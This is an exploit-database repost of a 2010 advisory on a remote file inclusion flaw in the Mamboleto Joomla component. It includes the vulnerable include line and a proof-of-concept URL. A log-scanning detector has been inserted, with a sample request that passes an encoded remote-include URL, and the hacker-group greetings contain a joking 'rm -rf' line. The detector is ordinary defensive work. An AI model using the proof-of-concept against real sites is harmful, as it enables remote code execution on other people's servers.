Mamboleto Joomla! component Remote File Include Vulnerability

CVE:
Category: CWE-98
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2010-01-14
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010010166

Below is a copy:

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulnerability
[!] Author: Don Tukulesto ([email protected])
[!] Homepage: http://www.indonesiancoder.com
[!] Date: December 10, 2009
[!] Tune In: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] New Mamboleto 2.0 RC3 for Joomla! 1.5.x in "legacy mode".
    Much improved, with two more banks (Sicredi and Bancoob) and a new VirtueMart integration module.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]
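
The proof of concept requests a component script directly and sets mosConfig_absolute_path in the query string, so the same pattern can be searched for in web server logs. The following detector is an added example, not part of the original advisory: it assumes combined-format access logs, and the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Configuration variable that the advisory's request sets from the URL.
PARAM = "mosConfig_absolute_path"
# Prefixes that make a PHP include read from a stream wrapper instead of local disk.
WRAPPER = re.compile(r"^\s*(https?|ftps?|php|data|expect):", re.I)
# Request target and status code of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE = [
    '192.0.2.10 - - [14/Jan/2010:10:00:01 +0000] "GET /index.php?option=com_mamboleto HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Jan/2010:10:00:05 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=http%3A%2F%2Fhost.example%2Fa.txt%3F HTTP/1.1" 200 312',
    '198.51.100.7 - - [14/Jan/2010:10:00:09 +0000] "GET /components/com_mamboleto/mamboleto.php?mosConfig_absolute_path=/tmp HTTP/1.1" 403 199',
]


def classify(log_line):
    """Return None for unrelated lines, else a dict describing the request."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".php"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        value = unquote(value)  # undo a second layer of percent-encoding
        return {
            "path": parts.path,
            "value": value,
            "remote": bool(WRAPPER.match(value)),  # wrapper/URL instead of a local path
            "served": 200 <= status < 400,         # request was not rejected by the server
        }
    return None


def scan(lines):
    """Collect every request that supplies the variable from the query string."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any hit is worth reviewing, since a legitimate client has no reason to supply this variable; hits with both "remote" and "served" set should be triaged first.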

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ] 

[>] FOR MALINGSIAL


[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : watch out, there's a workman =))
[+] arianom says : Collect Coins for Prita Mulyasari !!!
[+] Pathloader says : Okay then, if that's how it i... i... i... is :D
[+] tiw0L says : Don't eat it pleaseeeeee!!!
[+] kaMtiEz says : I'm not HOMO <++++ That's slander, he just won't admit it :p
